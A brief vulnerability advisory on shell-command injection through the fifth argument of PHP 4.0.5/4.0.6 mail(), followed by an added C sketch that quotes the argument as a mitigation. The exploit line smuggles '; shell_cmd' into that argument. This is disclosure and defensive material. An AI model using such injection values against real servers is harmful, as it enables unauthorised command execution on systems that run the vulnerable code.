The PHP mail() function does not check for shell escape commands,
even if PHP is running in safe_mode.
So it may be possible to bypass the safe_mode restriction and gain
shell access.
Affected:
php4.0.6
php4.0.5
Significant lines of ext/standard/mail.c:
>extra_cmd = (*argv[4])->value.str.val;
>strcat (sendmail_cmd, extra_cmd);
>sendmail = popen(sendmail_cmd, "w");
Exploit:
mail("[EMAIL PROTECTED]",
"test",
"test",
"test",
"; shell_cmd");
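
The quoted mail.c lines append the fifth mail() argument to the string that popen() hands to the shell. As an added example (not PHP's own code or its fix), the C sketch below shows one way to make that argument inert to the shell: single-quote it and build the command with bounds checks. The names shell_quote and build_sendmail_cmd and the sendmail path are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper, not from PHP: wrap `in` in single quotes so /bin/sh
 * sees one literal word; an embedded ' is emitted as '\''.
 * Returns 0 on success, -1 if `out` is too small. */
int shell_quote(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    if (outsz < 3) return -1;              /* room for '' and NUL */
    out[o++] = '\'';
    for (; *in; in++) {
        size_t n = (*in == '\'') ? 4 : 1;
        if (o + n + 2 > outsz) return -1;  /* keep room for closing ' and NUL */
        if (n == 4) memcpy(out + o, "'\\''", 4);
        else out[o] = *in;
        o += n;
    }
    out[o++] = '\'';
    out[o] = '\0';
    return 0;
}

/* Bounded replacement for the strcat() step: the extra argument is quoted
 * before it joins the string later passed to popen(). */
int build_sendmail_cmd(const char *sendmail_path, const char *extra_cmd,
                       char *cmd, size_t cmdsz)
{
    char quoted[512];
    int n;
    if (extra_cmd == NULL || *extra_cmd == '\0') {
        n = snprintf(cmd, cmdsz, "%s", sendmail_path);
    } else {
        if (shell_quote(extra_cmd, quoted, sizeof quoted) != 0) return -1;
        n = snprintf(cmd, cmdsz, "%s %s", sendmail_path, quoted);
    }
    return (n < 0 || (size_t)n >= cmdsz) ? -1 : 0;
}

int main(void)
{
    char cmd[256];
    /* Constructed input: sample sendmail path plus the page's fifth argument. */
    if (build_sendmail_cmd("/usr/sbin/sendmail -t -i", "; shell_cmd", cmd, sizeof cmd) == 0)
        puts(cmd);  /* the ';' is now inside quotes, so no second command runs */
    return 0;
}
```

Quoting only removes the shell's interpretation of the value; it still reaches sendmail as a single argument, so a safe_mode deployment would also want to restrict or reject the parameter.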
